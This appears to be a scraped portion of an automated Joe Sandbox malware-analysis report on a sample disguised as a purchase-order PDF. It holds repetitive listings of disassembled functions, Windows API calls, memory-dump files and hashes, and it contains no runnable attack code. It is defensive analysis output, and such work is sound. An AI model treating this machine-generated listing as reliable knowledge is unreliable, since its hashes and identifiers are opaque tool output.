                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2547909840-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                                                                                                                                                                                                                                            Function 00455297 Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                                                                                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2354583917-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                                                                                                                                                            • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                                                                                                                                                                                                                                            Function 0047762A Relevance: 10.6, APIs: 7, Instructions: 140windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                                                                            • GetMenu.USER32 ref: 004776AA
                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                                                                                                                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0047771A
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Menu$CountItemStringWindow_wcslen
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1823500076-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                                                                                                                                                                                                            • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                                                                                                                                                                                                                                            Function 00448877 Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 896007046-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                                                                                                                                                                                                            • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                                                                                                                                                                                                                                            Function 004413F0 Relevance: 10.6, APIs: 7, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00B71C40,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00B71C40,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                                                                                                                                                                                                            • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                                                                                                                                                                                                                                            Function 0044849C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 106windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 004484C4
                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                                                                                                                                                                                                                                            • IsMenu.USER32(?), ref: 0044857B
                                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32 ref: 004485E4
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 3866635326-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                                                                                                                                                                                            • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                                                                                                                                                                                                                                            Function 0047244D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104sleepCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                                                                                                                                                                                                                                            • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                                                                                                                                                                                                                                            • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                                                                                                                                                                            • String ID: 0vH
                                                                                                                                                                                                                                                                                                            • API String ID: 327565842-3662162768
                                                                                                                                                                                                                                                                                                            • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                                                                                                                                                                                                            • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                                                                                                                                                                                                                                            Function 00448AFF Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00448B1C
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                                                                                                                                                            • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3429747543-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                                                                                                                                                                                                            • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                                                                                                                                                                                                                                            Function 00401BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00401C62
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00401CBD
                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                            • String ID: Line:
                                                                                                                                                                                                                                                                                                            • API String ID: 1620655955-1585850449
                                                                                                                                                                                                                                                                                                            • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                                                                                                                                                            • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                                                                                                                                                                                                                                                            Function 0045D321 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045D3CC
                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
